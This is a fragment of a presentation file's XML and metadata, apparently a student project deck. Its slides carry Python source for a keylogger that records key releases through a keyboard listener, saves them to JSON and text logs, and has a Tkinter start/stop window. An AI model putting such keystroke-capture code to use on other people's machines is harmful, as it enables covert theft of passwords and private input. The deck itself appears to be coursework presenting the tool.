              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(anchor=CENTER)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>label.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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3764</Words>
  <Application>WPS Presentation</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>124</Paragraphs>
  <Slides>14</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14</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="25" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Inter</vt:lpstr>
      <vt:lpstr>Segoe Print</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>BOGGAVARAPU.VENKATA SAI</vt:lpstr>
      <vt:lpstr>PROJECT TITLE</vt:lpstr>
      <vt:lpstr>AGENDA</vt:lpstr>
      <vt:lpstr>PROBLEM	STATEMENT</vt:lpstr>
      <vt:lpstr>PROJECT	OVERVIEW</vt:lpstr>
      <vt:lpstr>WHO ARE THE END USERS?</vt:lpstr>
      <vt:lpstr>YOUR SOLUTION AND ITS VALUE PROPOSITION</vt:lpstr>
      <vt:lpstr>def on_release(key):     global flag, keys_used, keys     keys_used.append(         {'Released': f'{key}'}     )      if flag == True:         flag = False     generate_json_file(keys_used)      keys = keys + str(key)     generate_text_log(str(keys))  def start_keylogger():     global listener     listener = keyboard.Listener(on_press=on_press, on_release=on_release)     listener.start()</vt:lpstr>
      <vt:lpstr>label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")     start_button.config(state='disabled')     stop_button.config(state='normal')  def stop_keylogger():     global listener     listener.stop()     label.config(text="Keylogger stopped.")     start_button.config(state='normal')     stop_button.config(state='disabled')  root = Tk() root.title("Keylogger") label = Label(root, text='Click "Start" to begin keylogging.') label.config(anchor=CENTER) label.pack()</vt:lpstr>
      <vt:lpstr>start_button = Button(root, text="Start", command=start_keylogger) start_button.pack(side=LEFT)  stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled') stop_button.pack(side=RIGHT)  root.geometry("250x250")  root.mainloop() </vt:lpstr>
      <vt:lpstr>THE WOW IN YOUR SOLUTION</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>RESULTS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KUMAR KORNU</dc:creator>
  <cp:lastModifiedBy>venka</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-13T09:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-21T13:18:39Z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A03F10D1C00343D0BCD7C360FAD0CFC4_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.2.0.13472</vt:lpwstr>
  </property>
</Properties>
</file>